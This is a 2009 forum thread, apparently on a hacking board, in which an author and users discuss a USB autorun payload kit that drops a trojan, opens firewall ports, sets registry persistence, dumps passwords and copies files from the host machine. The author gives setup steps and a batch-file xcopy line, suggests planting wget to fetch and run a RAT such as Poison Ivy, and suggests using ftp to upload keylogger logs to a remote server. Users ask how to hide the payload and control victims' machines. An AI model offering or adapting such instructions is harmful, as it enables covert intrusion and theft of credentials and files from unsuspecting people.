DingleBerries Posted April 1, 2009 Author Share Posted April 1, 2009 0x3, I am a bit confused about your question. Are you talking about installing asp shells and disabling firewall? I do not have any Server 2003 VMs atm, but that is easy to get ;). I was thinking about rewriting the backdoor in the future to support more things, and making it drop a file should be easy, i.e. have it sitting in the code then print it out to a text document named shell.php. It may take me a while, school and what not, but I will try to release what I can when I can(not all of my tools are here :, save the good stuff for my self :P). Quote Link to comment Share on other sites More sharing options...
0x3 Posted April 1, 2009 Share Posted April 1, 2009 :P so please let me know when u release your shell ... kz i really need it ... Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 1, 2009 Author Share Posted April 1, 2009 Slurper Final Quote Link to comment Share on other sites More sharing options...
Humper Posted April 1, 2009 Share Posted April 1, 2009 Let me explain it a bit more in detail. There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe. On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands. To use this you will need to make an ISO of the cd folder and flash that to the u3 side. Thanks great answer. Just a few more noobish questions: - I do know how to create an ISO file but how do I flash the usb-drive with it? - Does leroy jenkis work with an router that blocks ports? - Is it possible to get the usb-drive not showing up options when inserting it what to do with it? I tried out the latest version of slurp and it worked great and really quick. Does it only seach in C:\ and is it possible to seach for specific names also along with the other seach? What Im I possible to do with the python trojan? This release was amazing, just tell me if I could help you somehow. Regards Humper Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 1, 2009 Author Share Posted April 1, 2009 [sic] but how do I flash the usb-drive with it? Universal Customizer. There are a few versions floating around. The newest version works in vista as well as on 4GB< drives. Does leroy jenkis work with an router that blocks ports leroy jenkis just starts the payload, makPNF.exe is the actual Trojan and atm it does not. Later I may release a UDP version that will work on routers that block ports. Is it possible to get the usb-drive not showing up options when inserting it what to do with it? I have no idea what that even means. Does it only seach in C:\ and is it possible to seach for specific names It searches HOME DRIVE/HOMEPATH, so if your drive letter is F:\ it will still work. The rest of the payload relies on the drive being the C:\ drive but that isnt a hard fix, remember this was done in less than a day. Right now it will only do extensions, Adding complete file names never really crossed my mind, i will look into it though. Cheers! Quote Link to comment Share on other sites More sharing options...
Sly Posted April 1, 2009 Share Posted April 1, 2009 This is probably a dumb question... but how do I protect my computer from the programs once I put it on my U3? Because the current switchblade's payload still attacks my computer when I set it to protect my computer against it. O.o EDITTTTT scratch that!!! I'll just turn my auto-run off >.< Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 1, 2009 Author Share Posted April 1, 2009 Hold the "shift" key when you insert it. Quote Link to comment Share on other sites More sharing options...
Sly Posted April 1, 2009 Share Posted April 1, 2009 Let me explain it a bit more in detail. There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe. On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands. To use this you will need to make an ISO of the cd folder and flash that to the u3 side. Just a few more questions if I may... :P With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works. With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan? Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.< Thanks. :) Quote Link to comment Share on other sites More sharing options...
Humper Posted April 1, 2009 Share Posted April 1, 2009 Just a few more questions if I may... :P With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works. With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan? Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.< Thanks. :) If I understood it right you need to download python and then just write testconnection (IP ADRESS). For the rest just read the hole topic and you will get awnsers to that. Regards Humper Quote Link to comment Share on other sites More sharing options...
Sly Posted April 1, 2009 Share Posted April 1, 2009 If I understood it right you need to download python and then just write testconnection (IP ADRESS). For the rest just read the hole topic and you will get awnsers to that. Regards Humper Ok thanks. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 1, 2009 Author Share Posted April 1, 2009 Once python is installed, windows or linux, then you double click the pyw(windows) or ./client.pyw(linux). A gui will pop up asking to the IPaddress and below that there is a place to send commands. If you want to modify the payload add wget.exe to the CD partition and have it copy to the System root, best if you rename it, then you can download files from online and execute them via cmd. This is useful if you have a better RAT, i.e Poison IVY, and want to install the server to the remote computer. To add wget just modify the batch file xcopy wget.exe C:\Windows\System32 And if you add the keylogger to it Windows has a built in ftp command. That means you can remotely upload the log file to some ftp server and read the contents without going back. Just like in linux there are a lot of things that can be done via command line in windows, just read and research. THE MORE YOU KNOW! Also I havent tested it, but does the batch file show a windows when the drive is inserted? Or are there any signs, other than opening Task Manager, that the payload is running? Quote Link to comment Share on other sites More sharing options...
Jen Posted April 2, 2009 Share Posted April 2, 2009 there's a universal customizer that supports 8gb too! Quote Link to comment Share on other sites More sharing options...
Sly Posted April 2, 2009 Share Posted April 2, 2009 I'm getting an error with trying to create the new CD partition ISO with Universal Customizer... So I'm wondering what I'm doing wrong... I archived all the files in the CD folder and named the .rar U3CUSTOM... then I put the .rar into the BIN folder in the UC and ran it and got the error Failed to access your U3 smart drive. U3 Customizer will now shut down. And this is the error that comes up with the log in U3 [MUSK] [408][01:40:22]: CCDServiceImpl::burnImage - failed to open image file C:\UC\bin\U3CUSTOM.ISO I've tried many different ways to fix it... The older versions of my switchblade still work... so I dunno. If anyone can help... then yeah. :D I'll bake you brownies. <} Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 2, 2009 Author Share Posted April 2, 2009 If you bake me brownies I will do it. Seriously and you have to PROMISE that you will send them to me. Quote Link to comment Share on other sites More sharing options...
Sly Posted April 2, 2009 Share Posted April 2, 2009 Ok, Just send me a address and I'll make them tomorrow ^.^ lol I PROMISE :D Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 2, 2009 Author Share Posted April 2, 2009 http://chriswoodall.weebly.com/programs.html Quote Link to comment Share on other sites More sharing options...
messsy Posted April 2, 2009 Share Posted April 2, 2009 I see that people are confused. I did mention doing a newbie read me from scratch then just add to it as you add to it, ive not had time to test it but it looks good :-D Quote Link to comment Share on other sites More sharing options...
Humper Posted April 2, 2009 Share Posted April 2, 2009 Ok I've flashed the drive and added the "flash" folder to the root. But I still don't really get what client I should use for the keylogger. Also where does it save the IP and the computer info? Also how do I remove all of the files, keylogger and so that I enter to the computer? Regards Humper Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 2, 2009 Author Share Posted April 2, 2009 The FLASH folders CONTENTS go in the root of the flash drive, not the folder its self. There is no key logger in the payload... If you read the code in the bat, which runs the shit from flash, will will see how most of it works.. That is why I encouraged people to add to this. If you cant figure it out then I dont really care, It has worked on all the systems I have tested it on. Quote Link to comment Share on other sites More sharing options...
Sly Posted April 2, 2009 Share Posted April 2, 2009 http://rapidshare.com/files/216560498/U3.iso THIS ISO DOES NOT WORK. REMEMBER YOU HAVE TO CHANGE THE BAT FILE! Send me a message w/ an address and I'll make you the brownies ^.^ When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partiton works... I dunno... Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 2, 2009 Author Share Posted April 2, 2009 Send me a message w/ an address and I'll make you the brownies ^.^ When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partiton works... I dunno... Its running one extra command; cd SYS VOLUME. I have a person payload that uses that folder. So If you want you can make a folder named SYS VOLUME and put all the other stuff in there and I will work the same way. To add the keylogger add this to the begining of the batch file xcopy keylogger.exe C:\\Where\ever\ it whould copy it and then carry out the rest of the instructions Quote Link to comment Share on other sites More sharing options...
Sly Posted April 2, 2009 Share Posted April 2, 2009 Its running one extra command; cd SYS VOLUME. I have a person payload that uses that folder. So If you want you can make a folder named SYS VOLUME and put all the other stuff in there and I will work the same way. To add the keylogger add this to the begining of the batch file xcopy keylogger.exe C:\\Where\ever\ it whould copy it and then carry out the rest of the instructions I'm not having a problem with the programs or anything... Universal customizer wont add the ISO to the CD partition of the U3 device when I change the .bat file... when I don't mess with anything and use the one that you made it works just fine... Quote Link to comment Share on other sites More sharing options...
sem1845 Posted April 3, 2009 Share Posted April 3, 2009 i've got a weird problem here. I've got everything working great but the slurper only copies the last extension i put into the slurp.ini file ... my ini file looks like this: #Place file types here [File Types] Extensions = .gif Extensions = .jpg Extensions = .pdf Extensions = .txt /quote] but it only slurps the .txt file on other versions of your slurper it worked without problems Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 3, 2009 Author Share Posted April 3, 2009 i've got a weird problem here. I've got everything working great but the slurper only copies the last extension i put into the slurp.ini file You are right. I get to working on that sometime soon. Quote Link to comment Share on other sites More sharing options...
timmy Posted April 5, 2009 Share Posted April 5, 2009 Can you modify the slurper so that it can be pointed towards a File ? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.